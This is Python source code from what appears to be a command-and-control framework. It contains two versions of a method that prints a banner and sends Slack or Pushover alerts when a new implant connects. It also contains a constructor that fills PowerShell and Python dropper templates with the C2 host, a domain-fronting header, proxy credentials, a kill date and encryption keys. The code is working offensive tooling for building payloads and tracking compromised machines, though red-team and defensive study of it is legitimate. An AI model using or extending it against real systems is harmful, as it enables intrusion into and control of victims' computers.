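def display(self):
    """Print the new-implant banner and send the optional push notifications.

    The transport label is derived from ``self.Pivot``: ``"PBind"`` or ``"FComm"``
    when the pivot name contains those words (case-insensitive), otherwise the URL
    row resolved from ``self.URLID[0]`` via ``get_url_by_id`` (``"URL: Unknown"``
    when the lookup returns None). Pushover and Slack notifications are attempted
    only when ``get_notificationstatus()`` is ``"yes"`` and the respective token
    from ``select_item(..., "C2Server")`` is non-empty; each channel is wrapped in
    its own ``try`` so a delivery failure is printed and never stops the implant
    from being shown.

    The banner prints ``self.Key`` and ``self.RandomURI``; wherever this console
    output is captured (terminal logs, scrollback) it needs the same protection
    as the key itself.
    """
    print(Colours.GREEN, "")
    it = self.Pivot
    pivot = it.lower()
    # The three label choices are mutually exclusive. The previous form used a
    # stand-alone ``if`` for "pbind" followed by an ``if/else`` for "fcomm", so
    # the "PBind" label was always overwritten by the URL lookup in the ``else``.
    if "pbind" in pivot:
        urlInfo = "PBind"
    elif "fcomm" in pivot:
        urlInfo = "FComm"
    else:
        # The None check belongs to the database lookup only; the fixed labels
        # above must never be indexed as ``row[1]``.
        row = get_url_by_id(self.URLID[0])
        urlInfo = f"URL: {row[1]}" if row is not None else "URL: Unknown"
    print("[%s] New %s implant connected: (uri=%s key=%s)" % (self.ImplantID, it, self.RandomURI, self.Key))
    print("%s | Time:%s | PID:%s | Sleep:%s | %s (%s) | %s" % (
        self.IPAddress, self.FirstSeen, str(self.PID), str(self.Sleep),
        (str(self.User) + " @ " + str(self.Hostname)), self.Arch, urlInfo))
    EnableNotifications = get_notificationstatus()

    # Pushover: form-encoded POST; a non-200 response is printed with its body.
    try:
        Pushover_APIToken = select_item("Pushover_APIToken", "C2Server")
        Pushover_APIUser = select_item("Pushover_APIUser", "C2Server")
        if EnableNotifications.lower().strip() == "yes" and Pushover_APIToken:
            body = urllib.parse.urlencode({
                "token": Pushover_APIToken,
                "user": Pushover_APIUser,
                "message": "[%s] - NewImplant: %s @ %s" % (NotificationsProjectName, self.User, self.Hostname),
            })
            conn = http.client.HTTPSConnection("api.pushover.net:443")
            try:
                conn.request("POST", "/1/messages.json", body, {"Content-type": "application/x-www-form-urlencoded"})
                output = conn.getresponse()
                if output.status != 200:
                    print("\nPushover error: ")
                    print(output.read())
            finally:
                # Release the socket; the previous form left the connection open.
                conn.close()
    except Exception as e:
        print("Pushover send error: %s" % e)

    # Slack: JSON POST to chat.postMessage with a bearer token.
    try:
        Slack_BotToken = select_item("Slack_BotToken", "C2Server")
        if EnableNotifications.lower().strip() == "yes" and Slack_BotToken:
            mention_userid = select_item("Slack_UserID", "C2Server")
            channel = select_item("Slack_Channel", "C2Server")
            # Mention prefix: nothing, "<!channel> ", or "<@user-id> ".
            if mention_userid in ("", None):
                mention_userid = ""
            elif mention_userid.lower().strip() == "channel":
                mention_userid = "<!channel> "
            else:
                mention_userid = "<@%s> " % str(mention_userid)
            message = {
                "channel": channel,
                "text": "%s[%s] - NewImplant: %s @ %s" % (mention_userid, NotificationsProjectName, self.User, self.Hostname),
                "as_user": "******",
                "link_names": "true",
            }
            headers = {"Content-type": "application/json", "Authorization": "Bearer " + Slack_BotToken}
            conn = http.client.HTTPSConnection("slack.com:443")
            try:
                conn.request("POST", "/api/chat.postMessage", json.dumps(message), headers)
                output = conn.getresponse()
                # NOTE(review): only the HTTP status is checked here; an API-level
                # rejection reported inside a 200 response body is not detected.
                if output.status != 200:
                    print("Slack error: ")
                    print(output.read())
            finally:
                conn.close()
    except Exception as e:
        print("Slack send error: %s" % e)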
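def display(self):
    """Print the new-implant banner and send an optional Pushover notification.

    Older variant of ``display``: the transport label is ``"PBind"`` when
    ``self.Pivot`` contains "pbind" (case-insensitive), otherwise the URL row
    resolved from ``self.URLID[0]`` via ``get_url_by_id`` (``"URL: Unknown"``
    when the lookup returns None). The Pushover message is sent only when
    ``get_notificationstatus()`` is ``"yes"`` and a token is configured; any
    failure is printed and otherwise ignored.

    The banner prints ``self.Key`` and ``self.RandomURI``, so captured console
    output is as sensitive as the key itself.
    """
    print(Colours.GREEN, "")
    it = self.Pivot
    if "pbind" in it.lower():
        urlInfo = "PBind"
    else:
        # The None check applies to the database lookup only, never to the
        # fixed "PBind" label.
        row = get_url_by_id(self.URLID[0])
        urlInfo = f"URL: {row[1]}" if row is not None else "URL: Unknown"
    print("[%s] New %s implant connected: (uri=%s key=%s)" % (self.ImplantID, it, self.RandomURI, self.Key))
    print("%s | Time:%s | PID:%s | Sleep:%s | %s (%s) | %s" % (
        self.IPAddress, self.FirstSeen, str(self.PID), str(self.Sleep),
        (str(self.User) + " @ " + str(self.Hostname)), self.Arch, urlInfo))
    EnableNotifications = get_notificationstatus()
    try:
        Pushover_APIToken = select_item("Pushover_APIToken", "C2Server")
        Pushover_APIUser = select_item("Pushover_APIUser", "C2Server")
        # Require a token as the sibling ``display`` does, so no request is
        # sent with empty credentials when notifications are on but unconfigured.
        if EnableNotifications.lower().strip() == "yes" and Pushover_APIToken:
            body = urllib.parse.urlencode({
                "token": Pushover_APIToken,
                "user": Pushover_APIUser,
                "message": "[%s] - NewImplant: %s @ %s" % (NotificationsProjectName, self.User, self.Hostname),
            })
            conn = http.client.HTTPSConnection("api.pushover.net:443")
            try:
                conn.request("POST", "/1/messages.json", body, {"Content-type": "application/x-www-form-urlencoded"})
                output = conn.getresponse()
                if output.status != 200:
                    print("\nPushover error: ")
                    print(output.read())
            finally:
                # Release the socket; the previous form left the connection open.
                conn.close()
    except Exception as e:
        print("Pushover send error: %s" % e)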
def __init__(self, KillDate, Key, Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory, URLID=None, ImplantType="", PowerShellProxyCommand="", PBindPipeName=DefaultPBindPipeName, PBindSecret=DefaultPBindSecret) -> None:
    """Collect the payload settings and render the Python/PowerShell dropper text.

    Args:
        KillDate: value substituted for ``#REPLACEKILLDATE#`` (must be a str, it is
            passed straight to ``str.replace``).
        Key: value substituted for ``#REPLACEKEY#`` in the PowerShell dropper.
        Insecure: value substituted for ``#REPLACEINSECURE#``.
        UserAgent: value substituted for ``#REPLACEUSERAGENT#``.
        Referrer: value substituted for ``#REPLACEREFERER#``.
        ConnectURL: value for ``#REPLACECONNECT#``; ``ConnectURL + ImplantType``
            fills ``#REPLACECONNECTURL#``.
        BaseDirectory: directory prefix that ``aes.py`` is written under when it is
            generated here.
        URLID: URL row id; ``get_default_url_id()`` is used when falsy.
        ImplantType: suffix appended to ``ConnectURL``.
        PowerShellProxyCommand: value substituted for ``#REPLACEPROXYCOMMAND#``.
        PBindPipeName: falls back to ``DefaultPBindPipeName`` when falsy.
        PBindSecret: falls back to ``DefaultPBindSecret`` when falsy.

    Side effects: reads ``<PayloadsDirectory>aes.py`` if it exists, otherwise reads
    ``<PayloadTemplatesDirectory>aes.py`` and writes ``<BaseDirectory>aes.py``;
    always reads ``<PayloadTemplatesDirectory>dropper.ps1``. The rendered texts
    (``self.PSDropper``, the written ``aes.py``) embed the key and the proxy
    credentials from the URL row as plain text, so ``BaseDirectory`` permissions
    matter as much as the database's.

    Raises: whatever ``open`` raises for missing templates; ``TypeError`` /
    ``IndexError`` if ``get_url_by_id`` returns None or a row shorter than seven
    columns.
    """
    if not URLID:
        URLID = get_default_url_id()
    self.URLID = URLID
    # Row layout relied on below: [2]=comms host, [3]=domain-front header,
    # [4]=proxy URL, [5]=proxy user, [6]=proxy password (column names inferred
    # from the attributes they populate; not verified against the schema).
    urlDetails = get_url_by_id(self.URLID)
    self.KillDate = KillDate
    self.Key = Key
    self.QuickCommand = select_item("QuickCommand", "C2Server")
    self.FirstURL = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server"))
    self.PayloadCommsHost = urlDetails[2]
    self.DomainFrontHeader = urlDetails[3]
    self.Proxyurl = urlDetails[4]
    self.Proxyuser = urlDetails[5]
    self.Proxypass = urlDetails[6]
    self.PowerShellProxyCommand = PowerShellProxyCommand
    self.ImplantType = ImplantType
    self.Insecure = Insecure
    self.UserAgent = UserAgent
    self.Referrer = Referrer
    self.ConnectURL = ConnectURL
    self.BaseDirectory = BaseDirectory
    self.PBindPipeName = PBindPipeName if PBindPipeName else DefaultPBindPipeName
    self.PBindSecret = PBindSecret if PBindSecret else DefaultPBindSecret
    # Duplicate of the assignment above; harmless.
    self.BaseDirectory = BaseDirectory
    self.PSDropper = ""
    self.PyDropper = ""
    # Reuse the key already embedded in an existing aes.py so previously built
    # payloads keep working; otherwise generate a fresh key and write aes.py.
    if os.path.exists("%saes.py" % PayloadsDirectory):
        with open("%saes.py" % PayloadsDirectory, 'r') as f:
            content = f.read()
        m = re.search('#KEY(.+?)#KEY', content)
        if m:
            keyfound = m.group(1)
        # Hash covers the whole file as read, so any edit to aes.py changes it.
        self.PyDropperHash = hashlib.sha512(content.encode("utf-8")).hexdigest()
        # NOTE(review): layout was reconstructed from a whitespace-mangled copy;
        # if these two assignments sit outside ``if m:`` (as laid out here) an
        # aes.py without a ``#KEY...#KEY`` marker raises NameError on ``keyfound``.
        self.PyDropperKey = keyfound
    else:
        # gen_key() returns bytes (it is .decode()d here).
        self.PyDropperKey = str(gen_key().decode("utf-8"))
        randomkey = self.PyDropperKey
        with open("%saes.py" % PayloadTemplatesDirectory, 'r') as f:
            content = f.read()
        aespy = str(content).replace("#REPLACEKEY#", "#KEY%s#KEY" % randomkey)
        filename = "%saes.py" % (self.BaseDirectory)
        with open(filename, 'w') as f:
            f.write(aespy)
        self.PyDropperHash = hashlib.sha512((aespy).encode('utf-8')).hexdigest()
    # Files are opened without an explicit encoding, so the platform default
    # applies to both the template read and the aes.py write.
    with open("%sdropper.ps1" % PayloadTemplatesDirectory, 'r') as f:
        content = f.read()
    # NOTE(review): #REPLACEIMPTYPE# is filled with PayloadCommsHost rather than
    # ImplantType -- confirm this is intended by the template.
    self.PSDropper = str(content) \
        .replace("#REPLACEINSECURE#", self.Insecure) \
        .replace("#REPLACEHOSTPORT#", self.PayloadCommsHost) \
        .replace("#REPLACECONNECTURL#", (self.ConnectURL + self.ImplantType)) \
        .replace("#REPLACEIMPTYPE#", self.PayloadCommsHost) \
        .replace("#REPLACEKILLDATE#", self.KillDate) \
        .replace("#REPLACEPROXYUSER#", self.Proxyuser) \
        .replace("#REPLACEPROXYPASS#", self.Proxypass) \
        .replace("#REPLACEPROXYURL#", self.Proxyurl) \
        .replace("#REPLACEPROXYCOMMAND#", self.PowerShellProxyCommand) \
        .replace("#REPLACEDOMAINFRONT#", self.DomainFrontHeader) \
        .replace("#REPLACECONNECT#", self.ConnectURL) \
        .replace("#REPLACEUSERAGENT#", self.UserAgent) \
        .replace("#REPLACEREFERER#", self.Referrer) \
        .replace("#REPLACEURLID#", str(self.URLID)) \
        .replace("#REPLACEKEY#", self.Key)